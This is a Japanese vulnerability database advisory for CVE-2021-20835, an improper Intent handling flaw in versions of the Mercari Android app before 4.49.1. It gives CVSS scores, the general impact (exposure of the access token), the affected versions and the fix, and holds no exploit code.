[Japanese]

JVNDB-2021-000096

Android App "Mercari (Merpay) - Marketplace and Mobile Payments App" (Japan version) vulnerable to improper handling of Intent

Overview

Android App "Mercari (Merpay) - Marketplace and Mobile Payments App" (Japan version) provided by Mercari, Inc. is vulnerable to improper handling of Intent (CWE-939).

RyotaK reported this vulnerability to Mercari, Inc. and Mercari, Inc. reported it to JPCERT/CC to disclose the vulnerability through JVN.
CVSS Severity (What is CVSS?)

CVSS V3 Severity:
Base Metrics 7.4 (High) [IPA Score]
  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: None
  • User Interaction: Required
  • Scope: Changed
  • Confidentiality Impact: High
  • Integrity Impact: None
  • Availability Impact: None
CVSS V2 Severity:
Base Metrics 4.3 (Medium) [IPA Score]
  • Access Vector: Network
  • Access Complexity: Medium
  • Authentication: None
  • Confidentiality Impact: Partial
  • Integrity Impact: None
  • Availability Impact: None
Affected Products


Mercari Co., Ltd.
  • Mercari Android App (Japan version) versions prior to 4.49.1

The developer states that affected versions are no longer used at this point because the update was applied automatically when the application was launched in the past.
Impact

If a user who is using the vulnerable application accesses a malicious page, the malicious page can launch an arbitrary Activity of the application. As a result, Mercari account's access token may be obtained.
Solution

[Update the application]
Update the application to the latest version according to the information provided by the developer.
The developer states there is no need for users to take any actions since the application is automatically updated when it is launched.
Vendor Information

Mercari Co., Ltd.
CWE (What is CWE?)

  1. Permissions(CWE-264) [IPA Evaluation]
CVE (What is CVE?)

  1. CVE-2021-20835
References

  1. JVN : JVN#49465877
  2. National Vulnerability Database (NVD) : CVE-2021-20835
Revision History

  • [2021/10/29]
      Web page was published

Date Public2021/10/29
Date First Published2021/10/29
Date Last Updated2021/10/29